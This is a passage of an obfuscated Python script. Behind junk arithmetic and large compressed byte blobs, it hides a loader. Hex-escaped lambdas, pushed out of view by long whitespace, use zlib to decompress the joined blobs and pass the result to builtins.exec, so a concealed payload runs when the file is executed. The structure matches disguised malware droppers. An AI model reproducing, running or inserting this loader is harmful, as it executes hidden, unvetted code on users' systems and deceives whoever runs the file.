mi)\x81Y\x02\xd5\xdb\xd2\xc1x\x8a\x1d\x1b\xbb%\x05m\x9f\x0e\x8f\xc9\'D\x0b\xeb\\[\x1b\xe0,\xca7TTI\x96\xe3\xee\xd6\xdeR\x04\x86\xcfDf\x84Y\xf7\xca\xd3`6q\x1f\xd1@C\x93\x01\xb9=E\xa1U\xda\xad\xb1\xa7\xd0z7\xf0(U\x18)~>\xb9K\x8f\xaa+\xed|\xce\x8dyK.\x1f\xbc\x9c\x86\x0b\x99\x99_5\xf6\x04\xff\xae\xbc\xaf\xa2\xa3\xd3\xaa,\x06\xa9/\x9e\xb5\x84i\xbb\xb4\'6(\xbd\xc6\xd1\xd8\xf14\x93\xa8a\xfa\xa3ux\x99(x:\xa4\xd9\x03\xefX\x81:\xe6\xf1\x99\x00\xed\x06d\x88\x05\x8blu\xd6|\xb6VT\x19\xb3\xcf+\xef\x12\xcd\xee\xa7\x05\xfd\xb1\xca\t\xc2\x865b\xe4>x:G\xa46>r\x81g\xd5\xe4\x8e=\xf7\x10\xea@\x18b\x82\xe2y\x06g(SW}\x9d\x93\xd0\x03a\x80dy\xb2\xa11\x8a\x9a\xca\xa7)\x9b\xba\xcb\x957\xb7\xedzx\x9a\x9eM\xe4Zbx\xf5\xbe\xea\x1b\xacW&\xb2=\xe2\xa0\xb8%\xb9\xf3\x96\x01\'\xea\xe9\xa1\xf5\xc5\'\x93\x16\xd9\xd9\x97\x8f;\xb6c\x91\xad\x00VST\xed\x87\xc7\x96\xa0"R\xb3\xd8\x89j\x86\x8b\x815\x97\xe1\xa75r\xbe\xf1+\x18\x12\x1b\xcbt,\xab\x8a\x87\xe7A\x7f\xb8\xf2\x0f=\xddK\x8d\xc9\xc0\x9bk\xe9\x88\xdb\x12\x10\x03u[\xd3\x9d\x99"\xee\x1a\x9b\x99\xee\xca?\x84\xf7+\x8f\xa5\x14k:c\xcb\xe9\xa5g\x8b\xfa\xba\x96\xa7{\xac\xe0\x1a<b\x8eb\xcbP\xe1\xb3\x8d\x06\xe4\x81ew\xc8\x9e\xb1\xb5+\xe5XB"\xbe\xc8\x14\x8c\xd3@u^\xbc\x939\xdfZY\xee\xd6X\xf5\t%\x87\x86Z\x9e\xf9o\xc1\xae_\xb2\x8aYj\xbe\xf7\xf9\xb3\xc6D_hi\x0b\xc6\x9d\x8e\xcf\x91uSF\x8d\xc7\x9e\x1c\xb2$\xa1\xd46$\xf9\xcd\xd3\xaeh\x83\x87\xb8\xa8\xd9\x84\x05\x89]2\xf5\xab\xf7fwT\xe0{"\xb1b\xa3\x82\x01`\xa1\x91}\xbc\x800\\\x8a\x08\xaeH\xa3\x12\xca+\xf5\xc1\x93\xc1qY\x1a!\xea\xf2\x86\xa2\xb0\x11\x1c\x06\xa6\xae\x02\xed\xa1\x044\x12\xab \x18\x98\x97\x9a\x84\xe7"\x8e[\xe6\xc0c\xb2\xf8\x0e\xc8\x04\xc5\xb6_\xf8\\\xd5\x15\xf4Rn\xc9\xf4\xab\xd5\x05\xeaw(L\xa2\xed\x1b%\xd2\x82\xc5oq\x14\xf1\x98\xf3\x8c\x94%cO\xad\x1bt\x1bI\xa4D\xcc\x0f\xdf[O\xcf\\\xcf"\x1f\x13\xa0J4|=\x05T\xed$b\x7f\xd6\xf2wC\x1b\x896Vi\x8b\xd5\x97+Of\x19\r\xc3\xf0\xf4\x915\xa2\x8b?y\x84=\x993C%[\x95P\x1f\xfb\xac+\xdb~|\x10\xecn\xc544\'\xb5\x7f\xa9m\x8b]V\xa4\\\x90<A.\x06\xb5j2\xd4S')

        if 133840 > 4402665:
            Random.Add(Calculate = -87461 - Random.Math)
        elif 108394 < 3255349:
            Floor(Cube = 65222 * -21574).Add(Calculate = -57967 + Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='liiijjjiijjliijjllj',Square=b'\x12\xd1\x10\xb0\xb5\xe6\x031J\xa8h\xb1\xeb\xb4\x8d\x81\xfe\xd3\n\x1e\xf6\x84+O&j\xdb\xc4\x01\xd3\x91\x11Uu\x18\xa0\x9a~-\xa7\xb0\xa9\xef\x19\xcf\xa2 \x90<\x02\xf0\xfb4\x81\rI3\xa9\xdc\xd6!!\xe2\xf8[\xeal\xb8\xae\xfbM\xd5D3\xdfZf\xea\x804\xdb\x81\x04\x11\xb2\xbb\x0e\xad\xae\xe8\x9a(\x08\xbb<\xc4f\x87cz\x0b[\xcac\x84\xd0\x17\xb1\xcc\x1a\x83\xa6z\xf5\xd8?D\xd1\x03l\xefS\x05+\x94{\xdd"4\xe9]\x1e\x8bb#\x96\x17\xf1r\xd6\xdd9gb?#(&}^3jO\x89\xd7\x88\x04e\x94\xc5`\x929\xa5iLdpm\xd0^x\xb7\xe2\xa9\x9b3\x94Fmyh\xfa\xa0\xa6#7\x12\\\xa3g\tKb\x12\x00\x17\xde\x80N\xebL$\'F-\x9e\x9fU\xee3\x13.\x91\xa6IS&\x88\xf1\r\xad\x9c\x96T\xa0\x91\x07\x17\xe0\x86<\xa5\xce2d\x0c\x00H\x06h\x17\x1b\xa2\xea\x0f/\x1e\xdb"\tb\x81M:\xf0\xd0SF\x86\x1e\x02\xbc\x81\x1d\x944\x8a[j\x85\xd9Js\r\x85\xa6\xe0\x12\x85\xf2\x93\xea\xa9\xd6\xb4epS\x15\x83\xa7\xac\x85b\x83Xm\xef4b\xb0\x00\xdfY\xd3U}\xfa\x8c\xc2D\xf0\xee\xa0\xe7\xc4\x13+\xc9\xa5\xf8\x0bh\x1cx|r\xe4\xa2\x1d\xb2]\xc0\xd32\xafHe\xf0_\x17ge\x9f\x96<\xd3\xd4\x1a`\x8c}bRF\xc4\x9agr\xd1\x8a@\xed\x9d\x93\xbf\x92\x8cmx#\x10\t\xa3:\x9b\x1e\x82\x1aS\x7f\xe7\xc9\xdae\x81\xe1\xf0X\xcbgVr\xb0\xc9|\n7I;Z\xbe\x94\x8c\xc0\x15\xc1\xa8\xbc\xc2\x91\xb3a\xe5\xc5jw\xacv\xc8\xce\xd9\x04r\xc6\xbd\xeb\x9c\xack4$\xd4\x96G3\x11OLh\x90G,\x7f\xe5$LD\x93\x08\xb5\xcd\x9a_\'\x04}\x96\xe5\xf9\xca\xb3vcl\'\xf0\xb5\xa7\xa5\xd7\x85\x08\x83\xcbg0\xad\xda\x18h\xe91\xdb\\\t\xeaL\xcb\xe2\xbc:\xb3\x8b\xaf\x13\x05Z\\\xdc\xd6\x80\x81\x16Z\xc4\xa2\xc9\xe9\x8a|\x94\x05\xea\x94<\xab\xc1\x08\x1f\xb2\x1buH\x13\xb7\xfa?\xaa\xb9\x16\x0cPI\xd4\xbf\xc6./m\x99\x10q\x96\xd0\x0e\x1a\x90DR\xb9\xef\x9d3\xa0\x9d\xde\xa0\xffR\xdb]\xd9(\xbb\x91\x80\xe2.\xf3\xb1*\xfa\x9f\xf9\x0f\x0c\x06\xe8-\x03\xc4\x95\xe2\x06\x16\xc5\xc3\x1dlP\xf5\x0f%\xcb\xbaH3\x06(\xf6<{\xfa\xf5=\x86\xcc`\xac\x00I\xe9\xe8q@\xb5\x0fD\x10\x0f\x83\xfdf\x8b_N\x04lC>7\x82_\xa0\xbd\xe1h\xf4\xf8~Z\x0e\xa7@\xa4\xe2\xf5\xe3\xd3\xe8)?\x99b\xf0M%d\xc3\xae\x008\xb8O\x10\xb2\xf5xh\x15\x9b\xfa\x8f\xd8\x06\xd7\xbf\xe5?NL\x0c"C\xee\xac\x1f|\xd3\xf7\xccR\xdc/\xaeD\xe3\xba3\xae\xf9\xab\xa5\xfb6\x9b\xdf8\xec\x8f\xcc\xa2C2\xe7B\'\xbcZ\xf6;\x13\xc5\xfb\tCV\xffu\xa1z\xcbS>~:\x1d=\x8d\x0eME\x0f\xd0\x96\xd6\xcb\x17m\x10\xd6>Q\xbaIG\xdf\xd8\xe9(\xf7c\xce^\nsx\xee&f\xe7\x16\xc8\xcf\xee\x19\x8f\x82\xae\\\xe4\x0f\xaa\x89(0\xf7p\x94?^\x97BGyw\x12:*\xdf\xeb\xf0\xd1\xff\xf1\xa7\x0b\x0c\x1f-\x05\xe6=>>\x17\x0f\x12\x99\x078_\xcf\x9c\xce\xb2~:[\xcc\x9ef\xa3\xf9\xecq\x04\x00\xc4\xeb\xdfU\x0b\x15\x0f\'\xe6\xe7\xdf\xb41X+\xb68=\x1e\x9f\x91\x1cvF\x01!0\xf3\xe34x>0\xed\xc1\x01\xa8\xb9\x1a\xa9|^\xf6\x8ey\xe1\xe3q\xa7vr\xfc\xd1r \x8a\xfd\x18}\x83\x06\x8dI\xd1\xb4\x95\x96\xb3\xee\xe6\xd2\xcb\xb1\xa0\x9e\xb9}F\'\xcb\xc3\x19\xeb\xa7\xbdi\x07\xfc\xd1\xc4\xd6VzD\xb9\xda\xfa^\xa1F\xcd\xc3SO\xe0\x9c7\xe3\x13\r\xf0\xc4\x02\n\x87\x95\xc02\x08\xd4\xbay\x84 \xad\x1b+0\xce\x8a\xf9\xca_f\x8fO\x8f\x877\x8f\xdff\xa4\xbd`\x1c\x0bF\xb6\\U\x82\xad8h\x8f"\xa6\xd5\x0e\x1f\xbf\xdd\xd9\n4\x9b\\\xaf\xea\x11Z\xa5\xfed\xff\xd5\xcf\xa34S\xab#\xb0W\x92\xf0b3v\xa7^y|\x1a\xb6\xe7\xc1\xf2A|F,\x08\x99uoY\xb2C\x06\x90\xe5g\x01\x7fD\x05\xf0i\\\xdc\xff\xa8\xaf\x18\xea<\x16z\xad2\x80Ls\x1a\x0ce\xe4\xe1\x8f\xc0#t\x07z2-\xa3\xff\x8c\xcaq\x06>\xf2VD\x8c\r\xc9\xb3E\x12\x1c-\x85\xc5\xa9g\xc2[L\xa7W\x9f>`\x03\x914\x8f\xea*\x1e\x7f~\xf5\x81\x16\x82\xd9\xad\xb8$\xa9\x01?\xf0\xe9\x1e\x1d\xadl\x06\xea<\x12J\xf7\xef\xb4\x04\xe3)\xa1C\xf9\x94PC\xc7+N^\x96-\xa3D\x19\xd7\x8e\xb6n\xc2IS\xa4\xc9\x19\x8bC\x03FU\x0e\xce\xaf>\x08\xd8\xd4\x98_\xa8[\xe9s\xf7,\xe3+k\x80\xc7\xd0\x0c\x06\xca\xa0At\x83+\xcf\xe0?\xd9\x8e\x04u\x19\xbd0d\xed\xe4\x94\xec\x16\xaa\xad\xaf\xbcg\xcb\xfc\xcbn\xd3c>\xf2\x7f\xd4[\xcd\x8e#\xd4e\xb5\xe8[\xfd\xb5\xc6wC\x1b\x9b\xa1\x1c\xac\x1c\xcazR|\xfd`F_\t\x0f\x9a\x19\xe3b\xe6\x9b\x07\xf4\x19c9Xu&o8\xc8\xb2\xdd\x8ej\x83(7\xb0\x13\xd0\xefd<\x91U|h\xde\xfc6cW\xc2\xf3n\x19\x8c\xa1^\xecC\xb1\xc8@\xd0\x04P\xf6V\x0eN\xcb\x92&p\n\xc28\x10\xb0\xbb\x90Xmv\x13\x15\x1fx\x8a4\x0e\x1b\x16u?0Z\x1d\x9d#\x03\n\xff\xa3(\xe6\x06cTz\x85\x1e\xa53v \xdd\xd2\xd5\x89.;\xbf]5NM\xf0\x93N\x97\x1b\\z\xe4C\'U\x177h\x16\x82\x8b` \t\r\x1b\x9c\x93\xd4%\x08lB\xac\x06\xb4\xd6\x9f\x9bK\xf0f\x84\xd5\xb8\x9d\xcb\xc47c\xc47\x8cB-\xedY\xb8\xdf\x0b0\xff\x13\xb2c.H\x0fB\x0b\xd3/l\x88\x13\x9b\x044\xa2C\x0f\xd9f\x03\xd6.~\xc5\xe0\x95\xc6\xc7\xe1\x0ba6\xd7\xf7c\x19\xbf\xdd\xc7\xd8\x9cH\xac/\xef\x9f"M\xcaA7\xf4]Y%`\xa2\t\x14\x9a\x06\x94\xd7\x9a\xba\x99\xda\xf6\xb4yA\xa38@\x11P\rf\xae\x1c\xe3\xa9\x9f\x1ffO\xf9\x16\x11:i\x02\x116\x13\xe6[\x8d\xd3 \x9e&S\x8c\xd6\xf1\xd3\x9b\xe5\xdf\xa5\x93x\x9c\xe4\r\x18\xa0\x8e:;E8\x059%<\x9d\x9d\x9fBj\x9dB\xfa&\xa7\x90\x06\xc0%M\xa7@\xdb\xbb?\x05\xe6F\x15Zk>\x99J\xe9\xeeoN\x1f\xbbeT>\xadj\xe9\x1b\x9cV\x9a&Y\x12\xc9\xe9\xd0\xa7\xdd\x9fF\x96\xfa|\nj\xeb\r\x0e\x9f\xe44{$\x89\xba\x11\xa1\xbe=\xb5\xf2\xdd\x9f\xda\x04\x0e\xcc\xa7\x83\xdb\xbb?\x85\xb1:l\xaef\x94X\xbd\xa7\xbam*\xa5\xbb?\xad\x1e\xde\x9c,M\xd43\x80\x01\xce\'V+\x7f\x83\xc5@\r\xeb\x18NC\x9d@f\xd6)S\xf6\x8aSB*\x9c\x97\xa7\x87\xd1X\x93\x89\xfc2/nFs\x96\xfb\x1f="\xb4\xc2ol\xe2\x11,\xd0\x12\x05\xfd\xf0at\x83\x04e\x8f\\\x00\xcb:\xeb\xf7b\x05\xd0\x8a\x81\xd2\x1c@\x887Ul\x9a$\xe6\xb6S2\xf2b\x91\xab3S\x95\xbf\x19k)KS\x96}m\xfc\xfd\xe1\x11\xac<\x9fh\xc32X\xd4\xa4\xfe\xc7|\xae\xf6H\xb6\xbc\xbb|\xf1t"\x82\xa5\xcd\x92N\x9e\x85\xd2\xefh\xcf\x9f\x80\xcaO\tM\x87\xd5\xdd\x94\x857\xa5\x1aq\xfdi\xfe4\xfeu4\x9f[\xa7T\xb5\x94\xe0\xde\x0b%C-\xbe\x9bPoj\x93\xeb\xe9\xcd5\x84\x9a\x9f,,\xa3\x05nI=c\xc8Q\r\xd9\xb3\xa9\xa3\xa0 8\xf9\xf7\xff0\xbdN\xb5:\xc8vU\x85li3\xe1\xdd\x9db\xfdo\xa7\x02\n\xb0\xb2g\xa9OW\'\'\x0cm\xd5\xf8n\xf5\x7f\xfc\xeb\xd3\xd3}\xb1\x98\xff8\x192H\x94\x03\xd9\x88\\\xc2\xf7\xebR.H\xb1\xfaW\x1a\xc5\'n\x0b\xf6[\xac<;+\xf0\xe4E"q\x9e_\xd4\xc9\x91\xe9b\xce\xfeC%\x97\x1f?\xaa{\xf7\x90\x9f\xd88\x18\x1b\xd4\xbc\xfc\xcc\xf8GV\xfc\x8d\x08\xa2\xc0\xe6V\xfd\xc9\xef\xa3\xf9\xf7\xfc\xa4j\xbd\xc4\x13\x95\x0b\x13\x9c\x84\xd8\x1a\xae\xbc\x92\x05\x1e\xfa:\xf9\xdb\x87>\x03\xa1\xd0.|\xb5D\xc7Rm@\x9eb\x9f\x81\x10\x84\xf5#B:\xb8\xcfx\xe0[\n0\xc2\xb82\n,\x9b\xcf\x96(\xc8\xf0W\xeev\x1fN\xe8\xc4\r\xfa]pJ\xf4\xe9\xea\xc3p(i9\n\xc1\x04\xc1\xcb\x07l\x86\x0f\\\xc4\xcelB\xb6"I\xde\xf2\xc3\xbe\x96\xd6\x13\xc2\xeb\x8d\xf0\x15\xdf\x84~\x8c\x12\xa1\x9a\x04o$\xec\x1e\x82\xe7\x931M\x89P\x1e\xa4\xc1T\x89q\xfc\t~\xa9\xd6\xbc\x18C\xee\xb1\x8c\xcb\xcd>{f\x9f),\xd3c5\xcd\xcar\xd4\x80J\xb4z\xa58LE\x15\xa6\xcb\xaeW\xe2\xa9\xf7\xc3\x89\xa5\x84\x1b\xf7\xff\xca\x91p\'>\x08\xed\xa5\xa2OW<\xcf\x06\xcb\xef9~\xf5\r\xf7`\xe0\xbf\x1c\xfe\xfc\xf9\xf3\xd5\x15\xf7\x02\xed\xf5\x10g7|\xf9\xe1\xab`V\x0c\xb4\x8fo\xbe\x15@c\xcc\x81\x17\x9f\x97\x0f\xb2\x06\'\xa6\xcd\xa6\xf4\xbc\xba\xa2\xd3bx\xdf\xa5\x159\x0eN\xb1\x0f\xe8\x13+\x88\xa0\x91)\x04\x8b\xa1\xf4K\xec\xb1\xe4\xf7\xa3\xe8O\xee\x9bE\xe9<\x96M\xd4t{*\x93\xb5\xd1fWX0\xe6\x1c\xec%a\xe4\xb7\xec\xdd\xf2`\xb0\xf3\xecI6=\x8eT\x1a\xe2\xd0\xe2\x81=\xa4\xbf\xa2\xf8\x00\xd5iZ\x13C\xc5\xed\x9cm\xcdW\x1f4\xdc\xc6\xc0\x9c\xc8\x9dz\xe4!>\x99\x98\x14i\x83q/\xc6\xed&a{\xc6\x0b\xfe\xb2\xc4\xe1\x86>\xb4\xc9\xf7\xbb{$Z\x0b\xbc\xa97[L`\x11\xa5(\x84!\xc3\xd7\x11\x0f\xd8\xbcu\x0cbT\x80\xac\xd8.\x04\x19\xc3(\xc6s\x1d/\xac\x9e\xeaJ\xa5\xae\xbebl\x19\x8ba\xdb"bC\xb4\xcd\x07\xbb\x83\x9a\xc0\xac#\xcf\x8a\x0b\xe2\xd0xv_\x9a\xa6\x11\x88\x9d\x98zy .i\x9e)\x0bu\xe5Y\xd4\xc8B\xda@*\x86\xd4e\xd2\x90T\xda$\x0f\x99P')

        Random.Add(Calculate = 13713 - Random.Math)                                                                                                                                                                                                                                                          ;Floor.StackOverflow(Negative='nnmnmnnmmmmmnmnnnnm',Square=b'\x03^\xf7\x1a\xc9C5\xf1\xc7\x04^Z\x00\x91\xd2@m,\xf9\xcc\x8b_f\x0b\xe2/]-\xfd\x90X\xf2\xed\xaa&\x96\x90$xwS@C\x98]\x95[\x98\xa7:]\xf7\x9b1oZF\xce\xc1\xe0\xea\xef\x90u\xe6\xfdh1\xa9\xfc\x80P\x90\xec)\x809aM\xd5!\xd1\x87a\x8c8c\r\x01f\xf8w\'\x12\x80\xc5\x0c\xad\xaao\xbe_\xf2{\xbdN\n\x8e\x8a\xdf\xd5\x0e\xf4l\xa0\x9dD\xe4\x89\x9d-\xd9\r\xc7\xe0\xea\xf8\xdb\xaf\xea\xf7:\x8c\x99\xa2\xec\x10\xcc\xb8\x84jP\xfa\xdb2y\xc4\x1c\xe0R\xe3\'\x02\x1b\x10\x8a\xb1"5\xd1d vvB\x17@(\xf4\x8ae\xee\xc4rs\x99\xf8\x9e\xcf\x17\x1f\xaa\xadL\xf1v~\xc1\xf3\x1c4\xf2\xd5\x07\x01\xcc\x05\x1a\xed#\xa1\xb9\x95\xdf\x1b\xbf\xb6`\xcc\xa1\xa9\xae\x88\xf2v\xa8a\xe4C\x1d)\xf5\x01\x88\xd2\xea\x9e\xd0R\x07\x95\x15\x9a\x08v\x97\xb6\xeb\xe4\xc3I\xc9\xf1\x83\x9b\xe5\xf5c\xe9\xcaVr\xbfl^9,#\xbe03\xe0\xec(N}\x13\xd0\x8c\x1bW\x1fl\x00\x95\x8c\x0c\x9c\x1ee\r\xd5\xec&\x9faZ4\x01\x18\xbc\xa3#OxZt\xdb_\x9a\xc9\x90AA\x03\xe1\'\x06`\xc9\x92\x89P\x8di`\xbd{\xbfZ\xf2\x90\xb9\x12\xaa}\xd01\xa6\xf2vy\xc90\x80\xd9\xe3\xe8f\x9e_\xabmu;\x0c+\xd0\xf8nRGi\x98\xfc6\x02\xc4X,\x8e\xca>\xec\n/\x9e\xda\x8daY3\xfcj&\x98\\\xbdUY\xf2.\x8c\xdf\x96{\xf6\xd1\xbb\xf1\x1cL\xf4\x7f\xfa\xfe\xf8T\xdciV\xeeC\xe2\xed\xd6\x9f\x85\xd0\x08(\xbe\xdf\xc3\xc5!`EM\xa7S\xef\xa6x\xb2\x1cF\xa6S\xc0\x97\x9f@\xa3&\x96\xcd!+Q\xec\xfb\x81!\xb3\xa4\xf1\xd9\xf4\xaf\x011p\xa8\xef\xf7\x00\x08@\xe5\xfc\xf0\x1f\x07\xe7\x7f\xbe\xfe\xcb\xdf\xff\xcb?y\xff\xfa\x97\xf3\xe1\xdf\x9f^\xff\xeb?\x9f\xf3\xd1\xeb\xae0]\xd9:?\xe4\xb9?\xd4\xb1\x1f\x16\x9cn0g\xe6\xd9r\xd7\xa7\x1fPh\xd4)C?q\xd2:\xe5\x15\x109\xb5\xff}x\xaaq\xd8\xcc3\x01\xaf\xc7\xd8\x12\xe6\xa4M\xa0\xb1\x06+\x02\x1a\x9b\xf4\\:\x12\xeeO\xf8\xc4\xaa<^\xf7\xc5\xe3\xd3\xa1\xb9r\x8f\x0en\xfd\x84\xf6!?<\x92\x86\xd1\x84Z\xb0\xf2}\x7f\xbc\x86^ur2<e\xf2H\xd2\x82!\xfa\xa4r\xd9\x16\xe1\x85\x10\x01\xd0\xc6\xea\x96\x12f\x07\x9dRJ\xc9\x10\xa6\xdb<\xaa\x91\x807rp\x8a\'\x8f\x1dtV,\xf8\x0e\x99\xde\x83_\x12s\x17A\xfd\x10iJ\x88\xddA\xdd\x8b2z\x1e\xcd\x9e\xde\xdf\x00\xc5+\x90#O\x8a\xf1wX\xdf\x0f\xd5\n\xfet=\x9b\x9c\xa8\xc3I\xd9\x89}\xdc\x139>\x81\x80,#P\xc9\x9e\xa4\xc9\xd3\xf5-\xbf\xce_\x9e\xf2\xc5\xa3\xfa\xe9\xe3\xc97\x01\xb5\x8ap\x8c\xe1f\x02Fz,\xbe?\x8c\x95@\x85\\\xb9\xaa\xb2>g\xd3[\xef\xd5\xc2\t\x0b\xc3\xa1\xed-z\x11\xae\x15\x0b\x83\xb7\xe4\'\xb28\t\xe9\xd3\xe7\xf5\xd5\t(L\xe6\x10\xbc\xe9\xeb\xab\xeb\xa4[\xc2\xeex\xc4(\xbc\xbb\xd1\x0b\xb6\x14\x92\xe0\x9f\x18\x9e \x1d?\xfa_\xa4\xc8\xbc\xd2\xfb{-8\x96Z\x06\xa6\xdbrS\xads\xbb\x97j.q\xb5?\x14\xc5\x93wM\xe3\x83\x89\xaf\x9fG\xf3\xdf\xd6\xfe\x0e\xfeV:\xda\x91\x85\x99\x9d\xf7\xb8\xd7\xd5>\xf2kO\xf7\r\r:D\x06J\xe0eDo\xed\xca\x9f\xce\xd0\xa0I\xbf\x95#Y=m\xf51\xe1\x8f\xaf\xadN\x92\x8c\x8d\xb1\xfe\xc0|p\xf9\x99\x92\x9c\xe0\xbe\x1eZ\xbb<\xfao\'\xa5{\xbe\xfe\\\xe0o\xa2\xa6\xac\xd9\x82\xb0_\xeb\x98\x9bu\xa0\xaf\x183\xd5\xba\xb5\xf9l\xf1\x8a\r\x1a\xc1>U\xafz\xe4\xcd{\xd2\x03\xfc\xc3\xc9\xb31\xc4Y\xae\xdb\xb5{Xm\x06\xb0\xffj\xaa\xb7\xfe\xf9\n]}\xe9\x8f\xea\xc7\xd2U\xcc4{7R-\xfc/\xc3\xff\xf9\xe7\xcf\xde\xe0\x94\xbb\xf9\xddh,\xa4\x91\'Z\xa2\xe4D\x0e\xa8X\xd3}\xf9\xa6A\xcc\x86\x80\xe0\xe5\xf9\x13%\x8d9<\x84\xb4!\xd0=\x16(\x97\xfc\xf7\xff\xae\x14*\x98T\x1f\x8f\xfe\xbf\xf7\xfe\xcbtz\x04\xe3D\xca\xa0\x07c6\x99C!\x11+[!\xbd2g\x9e\xb9\xfd\xff\xc5\xe2X\ntL\x1b\xd0\xda\xcc\x189\xa79\xed`\xd6=\xba\xfav|\xfc\xb1\x9c\xaaA\xa2JY\xb1\xac\xcbbo\x0e#\x98-\xe3\xf1\xa7\xee\xc0.\r\xa3\xf8\x96%?\xa3Mi\xc6\x04\xa5\xf3\x93,h\xd1Uk\x93\x00\x99\x0b\x96\xac\xd8\xe5#=-K\xa8\x02l\xb8S(;\xd4\xf1\xfbZe X;\xfe\x16\xda\xe8z\xba\x85\x114\x95<\x9dI\x90L\xd3(\x9e.\xf5HO\xc5\xc5W\xe7\x19\xc5\xef*\x1e\xa4&\xf9\xad\xac\xb3\xa67%r\xde\xcf\xd5\x8d=\x94@BB\xc5\x17\xc8\xa9\x8d\x80\x1d\x8f\xa9\xbe\xd8\x00\x05\x8a\x1f\xed\xe7\xaf\xd7\xf7\x95\xd9\xad\n|7\xb1\xa9&\xfa\xe3\xca\xa3\x03\x7f \xee\xe59\xf1h\x812}\xf4_yf\xbb\x1b\xfd\x96_\x8f\x1e\xc6\xbf\xce~\xcf\x0f\xe1(\xdf\x8e?\x96LD\xe2\x04\xb8\xf2H0\x95\x08\xaf\x82\xc2\xb8A\xba\xf3\xacl+\xd8\'Y\xf2\xd9\xc2`\x9d\x07\xfd\xe9\x8d\xafs\xab\xc6\x81\x1fN\xc2\x1c}x\\\x02\xeeEL\x99\x9d\xab\xbb7M\xd3\xa0\x9f&I\xae\xeeQ\x94\x8e\x82,\xc8\xc1\xa5\x0f>c]\xaf\x1f\xa4A\x9cD\xc1T\xbdN\xe05\xce\x02?\x88\xa3~8R\xaf\xeaN\x06\xec\x11\x9c\xfa\xd94\x0bnn\xe2P\xdda\x00\x06@}s\xfc5X\x17\xfceo\x14\x05~\xac\xb3\xc3\xca\xef\x96\xa3\x1f\xe0\x17\xfd$\x83_\xf8Qh\x1d\xa5\x06JP5\xc0\x98\x0e\tO\xd7=|}\x1ea\x1fr\xd3r\x86\xb9\x88`!A\x12\x94\xcf*\x91r\xaeW\xba\x924\x83\xfd\xf9\xaa\xbd\xa1\xffS\xf6\xe8(\xb5\xce25\xdfE\xd6\xf5LF#u\xe4\x10\x93\x9d\x82\xff>\xb6\x7f\x93\x94\xca\xd5u5t\x0f\x90\xdcmK\xf5\xd0K\xb5TO\x020\xf5\xe5\x87\xbb\xa7\x87</\x138\xcd\x85\xcf\x9f=;\xb7H\x0b\xc1\xc3\xc2x\x0e\x16\x96:\xa1\xd4\xe2\xff\xbar\x8f\xc21f\xd4\xe1K\xd9\xdd\xd1;5\xe1^_\xe3\x87\xeb\x93\x13\xcd*b\xa2\xc9-\x15wVP"\x07XF1\xad\x92\x87\t\x9a\xd4E\xff\xff\xfaX^$')

        if 254683 > 1264588:
            Random._add(_round = Random.Math - 55029)
        elif 311682 < 6709819:
            Random._add(_round = Random.Math - 65566)                                                                                                                                                                                                                                                          ;MMMMNMNNMMMNNMMMNNMN,O0oo0o0o00o0Oo0OOO00,JJJJJIIIJIIJIILJIJI,IILJIIJJIJJJJLJILJL,SS2S2SS2S22S2S2SSSSS22S2S=(lambda xwwxxxxxxwxxwwxxwxww:xwwxxxxxxwxxwwxxwxww(__import__('\x7a\x6c\x69\x62'))),(lambda xwwxxxxxxwxxwwxxwxww:xwwxxxxxxwxxwwxxwxww['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda xwwxxxxxxwxxwwxxwxww:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xwwxxxxxxwxxwwxxwxww)"),filename='\x4f\x4f\x44\x44\x44\x4f\x4f\x6f\x4f\x44\x6f\x6f\x6f\x6f\x6f\x44\x44\x6f\x6f\x44',mode='\x65\x76\x61\x6c'))),(lambda IJLLJJJJJILLLLJLLJLLLL,xwwxxxxxxwxxwwxxwxww:IJLLJJJJJILLLLJLLJLLLL(xwwxxxxxxwxxwwxxwxww)),(lambda:(lambda xwwxxxxxxwxxwwxxwxww:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(xwwxxxxxxwxxwwxxwxww)"),filename='\x4f\x4f\x44\x44\x44\x4f\x4f\x6f\x4f\x44\x6f\x6f\x6f\x6f\x6f\x44\x44\x6f\x6f\x44',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
        if 274994 > 5358516:
            Random.Add(Calculate = -43945 - Random.Math)
        elif 250788 < 2468124:
            Floor(Cube = 80871 - -95657)._add(_round = Random.Math / 31312)                                                                                                                                                                                                                                                          ;SS2S2SS2S22S2S2SSSSS22S2S()(IILJIIJJIJJJJLJILJL(O0oo0o0o00o0Oo0OOO00(MMMMNMNNMMMNNMMMNNMN(JJJJJIIIJIIJIILJIJI('\x76\x61\x72\x73'))),Floor._algorithm(_hypothesis='nnnnnnnmnmnnmmmnmnmnnnmnn')+Floor._algorithm(_hypothesis='jliliijilijillilijji')+Floor._algorithm(_hypothesis='OoooO0oOo0oOOOOo0ooO0Oo00')+Floor._algorithm(_hypothesis='iljiiilljjjjllllljlljjj')+Floor._algorithm(_hypothesis='S22S22S2SSS222S2222S2')+Floor._algorithm(_hypothesis='IIIlIIlIIllIlllIIlII')+Floor._algorithm(_hypothesis='jiljllljljjjiiilliiijlll')+Floor._algorithm(_hypothesis='IIJJLILIIJLJJLLJI')+Floor._algorithm(_hypothesis='LJJLLILJIJIJIILIJJ')+Floor._algorithm(_hypothesis='liiijjjiijjliijjllj')+Floor._algorithm(_hypothesis='nnmnmnnmmmmmnmnnnnm')))

    except Exception as _theory:
        if 231962 > 7862752:
            Floor.execute(code = _run(_theory))

        elif 118332 > 8208094:
            Floor(Cube = 53020 + -35278)._add(_round = Random.Math + -30391)
